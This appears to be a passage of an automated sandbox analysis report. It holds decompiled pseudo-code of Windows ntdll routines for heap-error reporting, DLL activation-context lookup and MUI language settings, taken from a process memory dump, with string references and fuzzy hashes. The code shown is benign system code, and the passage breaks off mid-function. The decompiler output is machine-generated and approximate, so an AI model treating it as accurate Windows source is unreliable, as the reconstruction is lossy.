The critical section is owned by thread %p., xrefs: 0118B3B9
<unknown>, xrefs: 0118B27E, 0118B2D1, 0118B350, 0118B399, 0118B417, 0118B48E
write to, xrefs: 0118B4A6
The instruction at %p tried to %s , xrefs: 0118B4B6
The resource is owned exclusively by thread %p, xrefs: 0118B374
a NULL pointer, xrefs: 0118B4E0
*** enter .exr %p for the exception record, xrefs: 0118B4F1
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0118B323
The resource is owned shared by %d threads, xrefs: 0118B37E

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: f62c561f9d6b2aa3487d961b1a1bacfde64c4cd114cd15bfbc13345f2016788a
Instruction ID: 8e14b90cf1a2fb221b1f8d9caff679bbdba5668f6dd1b37e87f77d72c20c9a3f
Opcode Fuzzy Hash: f62c561f9d6b2aa3487d961b1a1bacfde64c4cd114cd15bfbc13345f2016788a
Instruction Fuzzy Hash: 69811271A08201FBDB2D7B4ACC96D6E3F2AAF56A95B41805CF9041F112D3669421CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 01191C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01191C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010DB150();
				} else {
					E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x11c589c);
				E010DB150("Heap error detected at %p (heap handle %p)\n",  *0x11c58a0);
				_t27 =  *0x11c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01191E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010DB150();
				} else {
					E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E010DB150("Error code: %d - %s\n",  *0x11c5898);
				_t113 =  *0x11c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010DB150();
					} else {
						E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010DB150("Parameter1: %p\n",  *0x11c58a4);
				}
				_t115 =  *0x11c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010DB150();
					} else {
						E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010DB150("Parameter2: %p\n",  *0x11c58a8);
				}
				_t117 =  *0x11c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010DB150();
					} else {
						E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010DB150("Parameter3: %p\n",  *0x11c58ac);
				}
				_t119 =  *0x11c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010DB150();
					} else {
						E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11c58b4);
					E010DB150("Last known valid blocks: before - %p, after - %p\n",  *0x11c58b0);
				} else {
					_t120 =  *0x11c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010DB150();
				} else {
					E010DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E010DB150("Stack trace available at %p\n", 0x11c58c0);
			}

0x01191c10
0x01191c16
0x01191c1e
0x01191c3d
0x01191c3e
0x01191c20
0x01191c35
0x01191c3a
0x01191c44
0x01191c55
0x01191c5a
0x01191c65
0x01191c67
0x00000000
0x01191c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01191c67
0x01191cdc
0x01191ce5
0x01191d04
0x01191d05
0x01191ce7
0x01191cfc
0x01191d01
0x01191d0b
0x01191d17
0x01191d1f
0x01191d25
0x01191d30
0x01191d4f
0x01191d50
0x01191d32
0x01191d47
0x01191d4c
0x01191d61
0x01191d67
0x01191d68
0x01191d6e
0x01191d79
0x01191d98
0x01191d99
0x01191d7b
0x01191d90
0x01191d95
0x01191daa
0x01191db0
0x01191db1
0x01191db7
0x01191dc2
0x01191de1
0x01191de2
0x01191dc4
0x01191dd9
0x01191dde
0x01191df3
0x01191df9
0x01191dfa
0x01191e00
0x01191e0a
0x01191e13
0x01191e32
0x01191e33
0x01191e15
0x01191e2a
0x01191e2f
0x01191e39
0x01191e4a
0x01191e02
0x01191e02
0x01191e08
0x00000000
0x00000000
0x01191e08
0x01191e5b
0x01191e7a
0x01191e7b
0x01191e5d
0x01191e72
0x01191e77
0x01191e95

Strings

heap_failure_freelists_corruption, xrefs: 01191CC9
Parameter2: %p, xrefs: 01191DA5
heap_failure_internal, xrefs: 01191C6E
heap_failure_buffer_overrun, xrefs: 01191C98
Last known valid blocks: before - %p, after - %p, xrefs: 01191E45
heap_failure_entry_corruption, xrefs: 01191C83
HEAP: , xrefs: 01191C16, 01191C3D, 01191D04, 01191D4F, 01191D98, 01191DE1, 01191E32, 01191E7A
heap_failure_invalid_argument, xrefs: 01191CAD
heap_failure_generic, xrefs: 01191C7C
Heap error detected at %p (heap handle %p), xrefs: 01191C50
heap_failure_virtual_block_corruption, xrefs: 01191C91
heap_failure_buffer_underrun, xrefs: 01191C9F
Parameter1: %p, xrefs: 01191D5C
heap_failure_cross_heap_operation, xrefs: 01191CC2
Parameter3: %p, xrefs: 01191DEE
Error code: %d - %s, xrefs: 01191D12
heap_failure_lfh_bitmap_mismatch, xrefs: 01191CD7
heap_failure_usage_after_free, xrefs: 01191CBB
heap_failure_listentry_corruption, xrefs: 01191CD0
HEAP[%wZ]: , xrefs: 01191C30, 01191CF7, 01191D42, 01191D8B, 01191DD4, 01191E25, 01191E6D
heap_failure_invalid_allocation_type, xrefs: 01191CB4
heap_failure_block_not_busy, xrefs: 01191CA6
Stack trace available at %p, xrefs: 01191E86
heap_failure_multiple_entries_corruption, xrefs: 01191C8A
heap_failure_unknown, xrefs: 01191C75

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: be424b9a1a64e5460d9fd329b95a434faace0bdcde882520c8bd0596ba8bdf6b
Instruction ID: 69118dddfc047748b9baf4ca3882f45937701152086dadde717356b70045c6ee
Opcode Fuzzy Hash: be424b9a1a64e5460d9fd329b95a434faace0bdcde882520c8bd0596ba8bdf6b
Instruction Fuzzy Hash: 0761D63A611287EFDB2DAB5AD485D297BF5EB14D31B4A803EF4695B301D73498C08F0A

Uniqueness

Uniqueness Score: -1.00%

Function 01108E00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E01108E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x11cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x11c8464; // 0x74660110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x11c5780 & 0x00000003) != 0) {
							E01155510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x11c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0111B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x11c7984; // 0xe12c50
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x11c8464; // 0x74660110
					 *0x11cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01109B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x11c5780 & 0x00000005) != 0) {
						_push(_t49);
						E01155510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01108e0f
0x01108e16
0x01108e19
0x01108e1b
0x01108e21
0x01108e7f
0x01108e85
0x01149354
0x0114936c
0x01149371
0x0114937b
0x01149381
0x01149381
0x0114937b
0x01108e9d
0x01108e9d
0x01108e29
0x01108e2c
0x01108e38
0x01108e3e
0x01108e43
0x01108eb5
0x01108eb9
0x011492aa
0x011492af
0x011492e8
0x011492e8
0x011492af
0x01108eb9
0x01108e45
0x01108e53
0x01108e5b
0x01108e5f
0x01108e78
0x01108e78
0x01108e7d
0x01108ec3
0x01108ecd
0x01108ed2
0x01108ed2
0x01108ec5
0x01108ec5
0x00000000
0x01108e7d
0x01108e67
0x01108ea4
0x0114931a
0x00000000
0x00000000
0x01149320
0x01108ea4
0x01108e70
0x01149325
0x01149340
0x01149345
0x01149345
0x01108e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01108E53

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0114933B, 01149367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0114932A
LdrpFindDllActivationContext, xrefs: 01149331, 0114935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01149357
P,, xrefs: 01108E2C

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$P,$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2098205801
Opcode ID: 0f4511d6d118765172dc9bd2a2d9b4360d467a16a4dcc147f6f5d1af16cab752
Instruction ID: 5c499f3ded333f96b5ae16343e4657d5943b4eaaa2cb35c4593afc8f59466dfd
Opcode Fuzzy Hash: 0f4511d6d118765172dc9bd2a2d9b4360d467a16a4dcc147f6f5d1af16cab752
Instruction Fuzzy Hash: 4F41D731E083359FDB3FAA1CC889A76BAA5BB05658F064179D954571D2EBF06DC08381

Uniqueness

Uniqueness Score: -1.00%

Function 010E3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E010E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E010E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E010E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E010E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E010E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E010E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L010F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0111F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01121370(_t276, 0x10b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0111BB40(0,  &_v68, _t170);
									if(L010E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0111BB40(_t257,  &_v68, _t243);
								if(L010E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01121370(_t278, 0x10b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L010F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0111F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01121370(_v16, 0x10b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0111BB40(_t262,  &_v68, _t244);
								if(L010E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01121370(_t282, 0x10b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0111BB40(_t262,  &_v68, _t201);
							if(L010E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L010F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0111F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01121370(_t280, 0x10b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0111BB40(_t267,  &_v68, _t245);
							if(L010E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01121370(_t284, 0x10b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0111BB40(_t267,  &_v68, _t224);
						if(L010E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x010e3d3c
0x010e3d42
0x010e3d44
0x010e3d46
0x010e3d49
0x010e3d4c
0x010e3d4f
0x010e3d52
0x010e3d55
0x010e3d58
0x010e3d5b
0x010e3d5f
0x010e3d61
0x010e3d66
0x01138213
0x01138218
0x010e4085
0x010e4088
0x010e408e
0x010e4094
0x010e409a
0x010e40a0
0x010e40a6
0x010e40a9
0x010e40af
0x010e40b6
0x010e40bd
0x010e40bd
0x010e3d83
0x0113821f
0x01138229
0x01138238
0x01138238
0x0113823d
0x0113823d
0x010e3da0
0x010e3daf
0x010e3db5
0x010e3dba
0x010e3dba
0x010e3dd4
0x010e3e94
0x010e3eab
0x010e3f6d
0x010e3f84
0x010e406b
0x010e406b
0x010e406e
0x010e406e
0x010e4070
0x010e4074
0x01138351
0x01138351
0x010e407a
0x010e407f
0x0113835d
0x01138370
0x01138377
0x01138379
0x0113837c
0x0113837c
0x0113835d
0x00000000
0x010e407f
0x010e3f8a
0x010e3f8d
0x010e3f90
0x010e3f95
0x0113830d
0x0113830f
0x010e3f9b
0x010e3fac
0x010e3fae
0x010e3fb1
0x010e3fb1
0x010e3fb6
0x01138317
0x0113831a
0x00000000
0x010e3fbc
0x010e3fc1
0x010e3fc9
0x010e3fd7
0x010e3fda
0x010e3fdd
0x010e4021
0x010e4021
0x010e4029
0x010e4030
0x010e4044
0x010e4046
0x010e4046
0x010e4044
0x010e4049
0x01138327
0x01138334
0x01138339
0x0113833c
0x010e404f
0x010e404f
0x010e404f
0x010e4051
0x010e4056
0x010e4063
0x010e4063
0x010e4068
0x00000000
0x010e4068
0x010e3fdf
0x010e3fe2
0x010e3fe4
0x010e3fe7
0x010e3fef
0x010e4003
0x010e4005
0x010e4005
0x010e400c
0x010e4013
0x010e4016
0x010e4017
0x010e401b
0x010e401e
0x00000000
0x010e401e
0x010e3fb6
0x010e3eb1
0x010e3eb4
0x010e3eb7
0x010e3ebc
0x011382a9
0x011382ab
0x010e3ec2
0x010e3ed3
0x010e3ed5
0x010e3ed8
0x010e3ed8
0x010e3edd
0x011382b3
0x011382b6
0x00000000
0x010e3ee3
0x010e3ee8
0x010e3eed
0x010e3ef0
0x010e3ef3
0x010e3f02
0x010e3f05
0x010e3f08
0x011382c0
0x011382c3
0x011382c5
0x011382c8
0x011382d0
0x011382e4
0x011382e6
0x011382e6
0x011382ed
0x011382f4
0x011382f7
0x011382f8
0x011382fc
0x011382ff
0x011382ff
0x010e3f0e
0x010e3f11
0x010e3f16
0x010e3f1d
0x010e3f31
0x01138307
0x01138307
0x010e3f31
0x010e3f39
0x010e3f48
0x010e3f4d
0x010e3f50
0x010e3f50
0x010e3f53
0x010e3f58
0x010e3f65
0x010e3f65
0x010e3f6a
0x00000000
0x010e3f6a
0x010e3edd
0x010e3dda
0x010e3ddd
0x010e3de0
0x010e3de5
0x01138245
0x010e3deb
0x010e3df7
0x010e3dfc
0x010e3dfe
0x010e3e01
0x010e3e01
0x010e3e06
0x0113824d
0x0113824f
0x01138254
0x00000000
0x010e3e0c
0x010e3e11
0x010e3e16
0x010e3e19
0x010e3e29
0x010e3e2c
0x010e3e2f
0x0113825c
0x0113825f
0x01138261
0x01138264
0x0113826c
0x01138280
0x01138282
0x01138282
0x01138289
0x01138290
0x01138293
0x01138294
0x01138298
0x0113829b
0x0113829b
0x010e3e35
0x010e3e38
0x010e3e3d
0x010e3e44
0x010e3e58
0x011382a3
0x011382a3
0x010e3e58
0x010e3e60
0x010e3e6f
0x010e3e74
0x010e3e77
0x010e3e77
0x010e3e7a
0x010e3e7f
0x010e3e8c
0x010e3e8c
0x010e3e91
0x00000000
0x010e3e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 010E3D8C
Kernel-MUI-Language-SKU, xrefs: 010E3F70
Kernel-MUI-Language-Disallowed, xrefs: 010E3E97
WindowsExcludedProcs, xrefs: 010E3D6F
Kernel-MUI-Language-Allowed, xrefs: 010E3DC0

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: f83f9c48747ab978d91919d2f266adfa4a82749e7b19269a549357b82f9d27b2
Instruction ID: a350fdbe67236d3ce9316bf8bfed7d1f97c94379702eb65a771ace57472cc70c
Opcode Fuzzy Hash: f83f9c48747ab978d91919d2f266adfa4a82749e7b19269a549357b82f9d27b2
Instruction Fuzzy Hash: 41F15A72D00219EFCB15DF99C984AEEBBF9FF48650F15016AE945EB211E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010ED5E0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E010ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
